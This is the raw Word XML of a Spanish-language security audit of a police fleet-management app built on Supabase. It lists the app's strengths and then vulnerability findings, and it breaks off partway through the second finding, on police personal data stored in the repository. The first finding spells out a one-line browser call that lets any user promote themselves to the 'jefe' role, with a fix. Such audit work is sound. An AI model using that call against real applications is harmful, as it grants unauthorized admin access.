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80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">AUDITORÍA DE SEGURIDAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="566573"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema DIPROTRAN — Guardia de Flota</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Junio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200"/>
              <w:left w:type="dxa" w:w="300"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="300"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">RESUMEN EJECUTIVO</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">La aplicación tiene una base de seguridad correcta con RLS y autenticación JWT.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Se identificaron 2 vulnerabilidades CRÍTICAS que requieren atención inmediata:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">escalación de privilegios por user_metadata y exposición de PII policial en el repositorio.</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Componente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Puntos fuertes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vulnerabilidades</w:t>
            </w:r>
          </w:p>
        </w:tc>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Severidad máx.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 de datos (Supabase/RLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Sólida</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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MEDIA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Autenticación y roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Buena base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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CRÍTICA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 / XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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escapeHTML()</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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ALTA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Datos sensibles / PII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Sin cifrado en repo</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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CRÍTICA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Almacenamiento de fotos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Compresión</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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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MEDIA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Modo offline / cola</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Robusto</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0</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BAJA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Worker / PWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Network-first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0</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INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="27AE60" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. PUNTOS FUERTES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La aplicación tiene varios mecanismos de seguridad implementados correctamente. A continuación se detallan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 Row Level Security (RLS) en todas las tablas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Las cuatro tablas del sistema (informes, personal, secciones, vehiculos) tienen RLS habilitado con políticas explícitas. Ninguna tabla es accesible sin autenticación, y el rol anon de Supabase queda completamente excluido.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100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅ Implementación correcta</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• ALTER TABLE ... ENABLE ROW LEVEL SECURITY — activo en las 4 tablas</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• Políticas diferenciadas por operación: SELECT, INSERT, UPDATE, DELETE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• Sin políticas 'allow all' para anon — acceso bloqueado sin token válido</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• DELETE restringido exclusivamente al rol 'jefe'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Control de acceso basado en roles via JWT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El sistema implementa dos roles (oficial y jefe) verificados server-side mediante el JWT de Supabase. El uso de auth.jwt() en las políticas RLS significa que el cliente no puede manipular su propio nivel de acceso... con una excepción importante que se detalla en la sección de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo correcto: el rol se lee del token firmado por Supabase, no de una variable del navegador. Un usuario que haga 'currentUserRol="jefe"' en la consola no obtiene permisos extra en la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Función escapeHTML() implementada y usada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La función escapeHTML() está definida en index.html y se usa consistentemente en la mayoría de los lugares donde se construye HTML dinámico: nombres de vehículos, observaciones, legajos, etiquetas de secciones, etc. Esto previene la mayoría de los ataques XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La cobertura es amplia: admin.js, historial.js y el código inline de index.html usan escapeHTML() en los datos que provienen del usuario o de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Service Worker con estrategia network-first correcta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El SW.js implementa una estrategia de caché sensata: network-first para archivos de la app (siempre sirve la versión más nueva cuando hay red), cache-first solo para assets estáticos como el logo. Las llamadas a Supabase y CDNs externos van siempre directo a red sin caché, lo cual es correcto para datos dinámicos y evita servir respuestas de auth obsoletas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 Soft-deletes en lugar de borrado permanente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Las bajas de personal y vehículos se implementan como actualización del campo activo: false en Supabase, no como DELETE. Esto protege contra pérdida accidental de datos y facilita auditoría histórica. La política RLS tampoco otorga DELETE a roles básicos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.6 Compresión de imágenes antes de subir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Las fotos de novedades se comprimen a máximo 1200px de ancho con calidad 0.82 JPEG antes del upload. Esto limita el tamaño de los archivos almacenados pero también tiene un efecto secundario de seguridad: reduce la probabilidad de que un atacante abuse del storage subiendo archivos enormes para agotar cuota.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7 Cola offline robusta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El sistema de cola offline (offline.js) maneja correctamente la sincronización de datos cuando se pierde la conexión: guarda los payloads en localStorage, evita duplicados por fecha, y los sube automáticamente al reconectar. Esto no introduce vectores de seguridad adicionales relevantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. VULNERABILIDADES DETECTADAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se encontraron 7 vulnerabilidades. Se presentan ordenadas por severidad.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CCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FADBD8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-01  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalación de privilegios: rol en user_metadata</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [CRÍTICA]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📂 Archivo: SETUP_RLS.sql + historial.js</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problema:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">El rol 'jefe' se almacena y verifica en auth.jwt()-&gt;'user_metadata'. El problema es que en Supabase, cualquier usuario autenticado puede actualizar su propio user_metadata llamando a supabase.auth.updateUser({ data: { rol: 'jefe' } }) directamente desde el navegador. El nuevo JWT emitido incluirá rol: 'jefe' y las políticas RLS lo aceptarán, permitiendo al usuario ejecutar INSERT/UPDATE/DELETE en tablas de personal, secciones y vehículos sin tener ese permiso.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cualquier usuario con cuenta (incluso rol 'oficial') puede auto-promovido a 'jefe' en segundos. Desde esa posición puede modificar el personal registrado, alterar la flota y eliminar registros del sistema.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Mover el rol a app_metadata (solo modificable via service_role). Crear una función SQL o trigger que establezca el rol desde una tabla de autorización controlada. Alternativa: usar una tabla roles en Supabase con RLS que solo el service_role pueda modificar, y leerla en las políticas.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CCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FADBD8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-02  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Datos PII policiales comprometidos en el repositorio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [CRÍTICA]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📂 Archivo: SETUP_PERSONAL_PII.sql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problema:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
